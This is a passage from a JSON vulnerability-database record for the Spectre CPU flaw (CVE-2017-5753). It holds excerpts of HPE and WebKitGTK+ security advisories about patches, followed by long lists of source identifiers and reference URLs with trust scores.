make them available to our customers in the coming\nweeks. \n\nMitigations for Variant 1 (Spectre) and Variant 3 (Meltdown) vulnerabilities\nrequire only OS updates and are not impacted. \n\n * HPE has provided a customer bulletin\n\u003chttps://support.hpe.com/hpsc/doc/public/display?docId=emr_na-a00039267en_us\u003e\nwith specific instructions to obtain the udpated sytem ROM\n \n - Note:\n \n + CVE-2017-5715 (Variant 2) requires that the System ROM be updated and a\nvendor supplied operating system update be applied as well. \n + For CVE-2017-5753, CVE-2017-5754 (Variants 1 and 3) require only\nupdates of a vendor supplied operating system. \n + HPE will continue to add additional products to the list. \n\nHISTORY\n\nVersion:1 (rev.1) - 4 January 2018 Initial release\n\nVersion:2 (rev.2) - 5 January 2018 Added additional impacted products\n\nVersion:3 (rev.3) - 10 January 2018 Added more impacted products\n\nVersion:4 (rev.4) - 9 January 2018 Fixed product ID\n\nVersion:5 (rev.5) - 18 January 2018 Added additional impacted products\n\nVersion:6 (rev.6) - 19 January 2018 updated impacted product list\n\nVersion:7 (rev.7) - 23 January 2018 Marked impacted products with TBD for\nSystem ROM updates per Intel\u0027s guidance on microcode issues\n\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \n\nSeveral vulnerabilities were discovered in WebKitGTK+. \n\nCVE-2017-5753\n Versions affected: WebKitGTK+ before 2.18.5. \n Credit to Jann Horn of Google Project Zero; and Paul Kocher in\n collaboration with Daniel Genkin of University of Pennsylvania and\n University of Maryland, Daniel Gruss of Graz University of\n Technology, Werner Haas of Cyberus Technology, Mike Hamburg of\n Rambus (Cryptography Research Division), Moritz Lipp of Graz\n University of Technology, Stefan Mangard of Graz University of\n Technology, Thomas Prescher of Cyberus Technology, Michael Schwarz\n of Graz University of Technology, and Yuval Yarom of University of\n Adelaide and Data61. Description: Security improvements\n are included to mitigate the effects. \n\nCVE-2017-5715\n Versions affected: WebKitGTK+ before 2.18.5. \n Credit to Jann Horn of Google Project Zero; and Paul Kocher in\n collaboration with Daniel Genkin of University of Pennsylvania and\n University of Maryland, Daniel Gruss of Graz University of\n Technology, Werner Haas of Cyberus Technology, Mike Hamburg of\n Rambus (Cryptography Research Division), Moritz Lipp of Graz\n University of Technology, Stefan Mangard of Graz University of\n Technology, Thomas Prescher of Cyberus Technology, Michael Schwarz\n of Graz University of Technology, and Yuval Yarom of University of\n Adelaide and Data61. Description: Security\n improvements are included to mitigate the effects. \n\n\nWe recommend updating to the last stable version of WebKitGTK+. It is\nthe best way of ensuring that you are running a safe version of\nWebKitGTK+. Please check our website for information about the last\nstable releases. \n\nFurther information about WebKitGTK+ Security Advisories can be found\nat: https://webkitgtk.org/security.html\n\nThe WebKitGTK+ team,\nJanuary 10, 2018\n\n. 7.2) - noarch, x86_64\n\n3", "sources": [ { "db": "NVD", "id": "CVE-2017-5753" }, { "db": "CERT/CC", "id": "VU#180049" }, { "db": "CNVD", "id": "CNVD-2018-00304" }, { "db": "BID", "id": "102371" }, { "db": "VULHUB", "id": "VHN-113956" }, { "db": "PACKETSTORM", "id": "145718" }, { "db": "PACKETSTORM", "id": "146017" }, { "db": "PACKETSTORM", "id": "147451" }, { "db": "PACKETSTORM", "id": "145641" }, { "db": "PACKETSTORM", "id": "145762" }, { "db": "PACKETSTORM", "id": "146771" }, { "db": "PACKETSTORM", "id": "145666" }, { "db": "PACKETSTORM", "id": "146026" }, { "db": "PACKETSTORM", "id": "146315" }, { "db": "PACKETSTORM", "id": "145837" }, { "db": "PACKETSTORM", "id": "145635" }, { "db": "PACKETSTORM", "id": "145774" } ], "trust": 3.6 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-113956", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-113956" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2017-5753", "trust": 3.2 }, { "db": "CERT/CC", "id": "VU#584653", "trust": 2.2 }, { "db": "BID", "id": "102371", "trust": 2.0 }, { "db": "CERT/CC", "id": "VU#180049", "trust": 1.9 }, { "db": "SECTRACK", "id": "1040071", "trust": 1.1 }, { "db": "SIEMENS", "id": "SSA-505225", "trust": 1.1 }, { "db": "SIEMENS", "id": "SSA-608355", "trust": 1.1 }, { "db": "PACKETSTORM", "id": "145645", "trust": 1.1 }, { "db": "LENOVO", "id": "LEN-18282", "trust": 1.1 }, { "db": "EXPLOIT-DB", "id": "43427", "trust": 1.1 }, { "db": "CERT@VDE", "id": "VDE-2018-003", "trust": 1.1 }, { "db": "CERT@VDE", "id": "VDE-2018-002", "trust": 1.1 }, { "db": "USCERT", "id": "TA18-141A", "trust": 0.8 }, { "db": "CNVD", "id": "CNVD-2018-00304", "trust": 0.6 }, { "db": "ICS CERT ALERT", "id": "ICS-ALERT-18-011-01E", "trust": 0.3 }, { "db": "ICS CERT ALERT", "id": "ICS-ALERT-18-011-01C", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10842", "trust": 0.3 }, { "db": "SIEMENS", "id": "SSA-168644", "trust": 0.3 }, { "db": "JVN", "id": "JVNVU93823979", "trust": 0.3 }, { "db": "PACKETSTORM", "id": "145837", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "145774", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "150863", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "145715", "trust": 0.1 }, { "db": "CNNVD", "id": "CNNVD-201801-150", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-113956", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "145718", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "146017", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "147451", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "145641", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "145762", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "146771", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "145666", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "146026", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "146315", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "145635", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#180049" }, { "db": "CNVD", "id": "CNVD-2018-00304" }, { "db": "VULHUB", "id": "VHN-113956" }, { "db": "BID", "id": "102371" }, { "db": "PACKETSTORM", "id": "145718" }, { "db": "PACKETSTORM", "id": "146017" }, { "db": "PACKETSTORM", "id": "147451" }, { "db": "PACKETSTORM", "id": "145641" }, { "db": "PACKETSTORM", "id": "145774" }, { "db": "PACKETSTORM", "id": "145762" }, { "db": "PACKETSTORM", "id": "146771" }, { "db": "PACKETSTORM", "id": "145666" }, { "db": "PACKETSTORM", "id": "146026" }, { "db": "PACKETSTORM", "id": "146315" }, { "db": "PACKETSTORM", "id": "145837" }, { "db": "PACKETSTORM", "id": "145635" }, { "db": "NVD", "id": "CVE-2017-5753" } ] }, "id": "VAR-201801-1712", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2018-00304" }, { "db": "VULHUB", "id": "VHN-113956" } ], "trust": 1.3327639805555553 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-00304" } ] }, "last_update_date": "2024-07-23T21:03:25.229000Z", "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-203", "trust": 1.1 }, { "problemtype": "CWE-200", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-113956" }, { "db": "NVD", "id": "CVE-2017-5753" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.2, "url": "http://www.kb.cert.org/vuls/id/584653" }, { "trust": 1.9, "url": "https://developer.arm.com/support/arm-security-updates/speculative-processor-vulnerability" }, { "trust": 1.9, "url": "https://access.redhat.com/security/vulnerabilities/speculativeexecution" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/102371" }, { "trust": 1.6, "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00115.html" }, { "trust": 1.6, "url": "https://support.apple.com//ht208394" }, { "trust": 1.6, "url": "http://www.dell.com/support/speculative-store-bypass" }, { "trust": 1.4, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180104-cpusidechannel" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "trust": 1.4, "url": "http://xenbits.xen.org/xsa/advisory-254.html" }, { "trust": 1.4, "url": "https://blog.mozilla.org/security/2018/01/03/mitigations-landing-new-class-timing-attack/" }, { "trust": 1.4, "url": "https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv180002" }, { "trust": 1.4, "url": "https://support.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbhf03805en_us" }, { "trust": 1.4, "url": "https://spectreattack.com/" }, { "trust": 1.4, "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "trust": 1.2, "url": "https://access.redhat.com/errata/rhsa-2018:0292" }, { "trust": 1.1, "url": "https://seclists.org/bugtraq/2019/jun/36" }, { "trust": 1.1, "url": "https://www.kb.cert.org/vuls/id/180049" }, { "trust": 1.1, "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4609" }, { "trust": 1.1, "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4611" }, { "trust": 1.1, "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4613" }, { "trust": 1.1, "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4614" }, { "trust": 1.1, "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2018-001.txt" }, { "trust": 1.1, "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2019-003.txt" }, { "trust": 1.1, "url": "https://aws.amazon.com/de/security/security-bulletins/aws-2018-013/" }, { "trust": 1.1, "url": "https://cdrdv2.intel.com/v1/dl/getcontent/685359" }, { "trust": 1.1, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-505225.pdf" }, { "trust": 1.1, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-608355.pdf" }, { "trust": 1.1, "url": "https://cert.vde.com/en-us/advisories/vde-2018-002" }, { "trust": 1.1, "url": "https://cert.vde.com/en-us/advisories/vde-2018-003" }, { "trust": 1.1, "url": "https://help.ecostruxureit.com/display/public/uadco8x/struxureware+data+center+operation+software+vulnerability+fixes" }, { "trust": 1.1, "url": "https://security.netapp.com/advisory/ntap-20180104-0001/" }, { "trust": 1.1, "url": "https://support.citrix.com/article/ctx231399" }, { "trust": 1.1, "url": "https://support.f5.com/csp/article/k91229003" }, { "trust": 1.1, "url": "https://support.lenovo.com/us/en/solutions/len-18282" }, { "trust": 1.1, "url": "https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-18-0001" }, { "trust": 1.1, "url": "https://www.suse.com/c/suse-addresses-meltdown-spectre-vulnerabilities/" }, { "trust": 1.1, "url": "https://www.synology.com/support/security/synology_sa_18_01" }, { "trust": 1.1, "url": "https://www.vmware.com/us/security/advisories/vmsa-2018-0002.html" }, { "trust": 1.1, "url": "https://www.debian.org/security/2018/dsa-4187" }, { "trust": 1.1, "url": "https://www.debian.org/security/2018/dsa-4188" }, { "trust": 1.1, "url": "https://www.exploit-db.com/exploits/43427/" }, { "trust": 1.1, "url": "https://security.gentoo.org/glsa/201810-06" }, { "trust": 1.1, "url": "http://packetstormsecurity.com/files/145645/spectre-information-disclosure-proof-of-concept.html" }, { "trust": 1.1, "url": "https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html" }, { "trust": 1.1, "url": "https://security.googleblog.com/2018/01/todays-cpu-vulnerability-what-you-need.html" }, { "trust": 1.1, "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00015.html" }, { "trust": 1.1, "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00016.html" }, { "trust": 1.1, "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00020.html" }, { "trust": 1.1, "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00034.html" }, { "trust": 1.1, "url": "https://lists.debian.org/debian-lts-announce/2019/04/msg00004.html" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1040071" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00006.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00007.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00008.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00014.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00016.html" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/usn/usn-3516-1/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/3540-1/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/3540-2/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/3541-1/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/3541-2/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/3542-1/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/3542-2/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/3549-1/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/3580-1/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/3597-1/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/3597-2/" }, { "trust": 1.0, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03871en_us" }, { "trust": 0.8, "url": "https://vuls.cert.org/confluence/display/wiki/vulnerabilities+associated+with+cpu+speculative+execution" }, { "trust": 0.8, "url": "https://bugs.chromium.org/p/project-zero/issues/detail?id=1528" }, { "trust": 0.8, "url": "https://developer.amd.com/wp-content/resources/124441_amd64_speculativestorebypassdisable_whitepaper_final.pdf" }, { "trust": 0.8, "url": "https://www.us-cert.gov/ncas/alerts/ta18-141a" }, { "trust": 0.8, "url": "http://cwe.mitre.org/data/definitions/208.html" }, { "trust": 0.8, "url": "https://software.intel.com/sites/default/files/managed/c5/63/336996-speculative-execution-side-channel-mitigations.pdf" }, { "trust": 0.8, "url": "https://software.intel.com/sites/default/files/managed/b9/f9/336983-intel-analysis-of-speculative-execution-side-channels-white-paper.pdf" }, { "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180521-cpusidechannel" }, { "trust": 0.8, "url": "https://fortiguard.com/psirt/fg-ir-18-002" }, { "trust": 0.8, "url": "https://support.hp.com/us-en/document/c06001626" }, { "trust": 0.8, "url": "http://www.hitachi.com/hirt/publications/hirt-pub18001/" }, { "trust": 0.8, "url": "https://www.ibm.com/blogs/psirt/potential-impact-processors-power-family/" }, { "trust": 0.8, "url": "https://docs.microsoft.com/en-us/cpp/security/developer-guidance-speculative-execution" }, { "trust": 0.8, "url": "https://access.redhat.com/security/vulnerabilities/ssbd" }, { "trust": 0.8, "url": "https://www.suse.com/support/kb/doc/?id=7022937" }, { "trust": 0.8, "url": "https://www.synology.com/en-global/support/security/synology_sa_18_23" }, { "trust": 0.8, "url": "https://wiki.ubuntu.com/securityteam/knowledgebase/variant4" }, { "trust": 0.8, "url": "https://kb.vmware.com/s/article/54951" }, { "trust": 0.8, "url": "https://aws.amazon.com/security/security-bulletins/aws-2018-015/" }, { "trust": 0.8, "url": "https://access.redhat.com/security/cve/cve-2017-5753" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5753" }, { "trust": 0.6, "url": "https://www.bleepingcomputer.com/news/security/list-of-meltdown-and-spectre-vulnerability-advisories-patches-and-updates/" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5715" }, { "trust": 0.5, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2017-5754" }, { "trust": 0.5, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.5, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2017-5715" }, { "trust": 0.5, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.5, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.5, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.4, "url": "https://access.redhat.com/errata/rhsa-2018:0008" }, { "trust": 0.4, "url": "https://access.redhat.com/errata/rhsa-2018:0010" }, { "trust": 0.4, "url": "https://access.redhat.com/errata/rhsa-2018:0016" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5754" }, { "trust": 0.3, "url": "http://www.amd.com/en-gb" }, { "trust": 0.3, "url": "https://www.arm.com/" }, { "trust": 0.3, "url": "http://www.intel.com/content/www/us/en/homepage.html" }, { "trust": 0.3, "url": "https://newsroom.intel.com/news/intel-responds-to-security-research-findings/" }, { "trust": 0.3, "url": "https://lwn.net/articles/738975/" }, { "trust": 0.3, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10842\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "https://support.apple.com/en-us/ht208394" }, { "trust": 0.3, "url": "https://www.chromium.org/home/chromium-security/ssca" }, { "trust": 0.3, "url": "https://www.amd.com/en/corporate/speculative-execution" }, { "trust": 0.3, "url": "https://source.android.com/security/bulletin/2018-01-01" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2018/jan/21" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2018/jan/22" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2018/jan/23" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1519778" }, { "trust": 0.3, "url": "http://xenbits.xenproject.org/xsa/advisory-289.html" }, { "trust": 0.3, "url": "https://support.google.com/faqs/answer/7622138" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/spectre_meltdown_advisory.asc" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/alerts/ics-alert-18-011-01c" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/alerts/ics-alert-18-011-01e" }, { "trust": 0.3, "url": "https://securityadvisories.paloaltonetworks.com/home/detail/120" }, { "trust": 0.3, "url": "https://jvn.jp/vu/jvnvu93823979/index.html" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "trust": 0.3, "url": "https://www.oracle.com/technetwork/topics/security/ovmbulletinapr2018-4431088.html" }, { "trust": 0.3, "url": "http://www.bd.com/en-us/support/product-security-and-privacy/product-security-bulletin-for-meltdown-and-spectre-update-1" }, { "trust": 0.3, "url": "https://googleprojectzero.blogspot.in/2018/01/reading-privileged-memory-with-side.html" }, { "trust": 0.3, "url": "https://access.redhat.com/errata/rhsa-2018:0007" }, { "trust": 0.3, "url": "https://access.redhat.com/errata/rhsa-2018:0009" }, { "trust": 0.3, "url": "https://access.redhat.com/errata/rhsa-2018:0011" }, { "trust": 0.3, "url": "https://access.redhat.com/errata/rhsa-2018:0017" }, { "trust": 0.3, "url": "https://www.symantec.com/security-center/network-protection-security-advisories/sa161" }, { "trust": 0.3, "url": "https://www.mozilla.org/en-us/security/advisories/mfsa2018-01/" }, { "trust": 0.3, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-168644.pdf" }, { "trust": 0.3, "url": "https://chromereleases.googleblog.com/2018/03/stable-channel-update-for-chrome-os_19.html" }, { "trust": 0.3, "url": "https://lists.vmware.com/pipermail/security-announce/2018/000397.html" }, { "trust": 0.3, "url": "https://www.vmware.com/security/advisories/vmsa-2018-0007.html" }, { "trust": 0.3, "url": "https://developer.arm.com/support/security-update" }, { "trust": 0.3, "url": "http://xenbits.xenproject.org/xsa/advisory-289.txt" }, { "trust": 0.1, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026amp;docid=emr_na-hpesbhf03871en_us" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2018:0047" }, { "trust": 0.1, "url": "https://access.redhat.com/solutions/3307851" }, { "trust": 0.1, "url": "https://wiki.ubuntu.com/securityteam/knowledgebase/spectreandmeltdown" }, { "trust": 0.1, "url": "https://www.ubuntu.com/usn/usn-3540-2" }, { "trust": 0.1, "url": "https://www.ubuntu.com/usn/usn-3540-1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1011.11" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/linux-lts-xenial/4.4.0-111.134~14.04.1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5803" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18241" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1066" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16911" }, { "trust": 0.1, "url": "https://security-tracker.debian.org/tracker/linux" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-6927" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1068" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13166" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-9016" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5750" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18232" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5332" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-0861" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5333" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16914" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000199" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16526" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18017" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7492" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16913" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1092" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18216" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13220" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16912" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18203" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000004" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/nvidia-graphics-drivers-384/384.111-0ubuntu0.17.04.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/nvidia-graphics-drivers-384/384.111-0ubuntu0.17.10.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/nvidia-graphics-drivers-384/384.111-0ubuntu0.14.04.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/nvidia-graphics-drivers-384/384.111-0ubuntu0.16.04.1" }, { "trust": 0.1, "url": "https://www.ubuntu.com/usn/usn-3521-1" }, { "trust": 0.1, "url": "https://www.apple.com/itunes/" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht201222" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/usn/usn-3523-1," }, { "trust": 0.1, "url": "https://usn.ubuntu.com/usn/usn-3541-1," }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/linux/4.13.0-37.42" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.13.0-1015.16" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/usn/usn-3597-1," }, { "trust": 0.1, "url": "https://support.hpe.com/hpsc/doc/public/display?docid=emr_na-a00039267en_us\u003e" }, { "trust": 0.1, "url": "https://security-center.intel.com/advisory.aspx?intelid=intel-sa-00088\u0026langu" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbhf03805en_us" }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "https://www.hpe.com/info/report-security-vulnerability" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "https://developer.arm.com/support/security-update\u003e" }, { "trust": 0.1, "url": "http://www.amd.com/en/corporate/speculative-execution\u003e" }, { "trust": 0.1, "url": "https://newsroom.intel.com/press-kits/security-exploits-intel-products/\u003e" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499" }, { "trust": 0.1, "url": "https://webkitgtk.org/security/wsa-2018-0001.html" }, { "trust": 0.1, "url": "https://webkitgtk.org/security.html" } ], "sources": [ { "db": "CERT/CC", "id": "VU#180049" }, { "db": "CNVD", "id": "CNVD-2018-00304" }, { "db": "VULHUB", "id": "VHN-113956" }, { "db": "BID", "id": "102371" }, { "db": "PACKETSTORM", "id": "145718" }, { "db": "PACKETSTORM", "id": "146017" }, { "db": "PACKETSTORM", "id": "147451" }, { "db": "PACKETSTORM", "id": "145641" }, { "db": "PACKETSTORM", "id": "145774" }, { "db": "PACKETSTORM", "id": "145762" }, { "db": "PACKETSTORM", "id": "146771" }, { "db": "PACKETSTORM", "id": "145666" }, { "db": "PACKETSTORM", "id": "146026" }, { "db": "PACKETSTORM", "id": "146315" }, { "db": "PACKETSTORM", "id": "145837" }, { "db": "PACKETSTORM", "id": "145635" }, { "db": "NVD", "id": "CVE-2017-5753" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#180049" }, { "db": "CNVD", "id": "CNVD-2018-00304" }, { "db": "VULHUB", "id": "VHN-113956" }, { "db": "BID", "id": "102371" }, { "db": "PACKETSTORM", "id": "145718" }, { "db": "PACKETSTORM", "id": "146017" }, { "db": "PACKETSTORM", "id": "147451" }, { "db": "PACKETSTORM", "id": "145641" }, { "db": "PACKETSTORM", "id": "145774" }, { "db": "PACKETSTORM", "id": "145762" }, { "db": "PACKETSTORM", "id": "146771" }, { "db": "PACKETSTORM", "id": "145666" }, { "db": "PACKETSTORM", "id": "146026" }, { "db": "PACKETSTORM", "id": "146315" }, { "db": "PACKETSTORM", "id": "145837" }, { "db": "PACKETSTORM", "id": "145635" }, { "db": "NVD", "id": 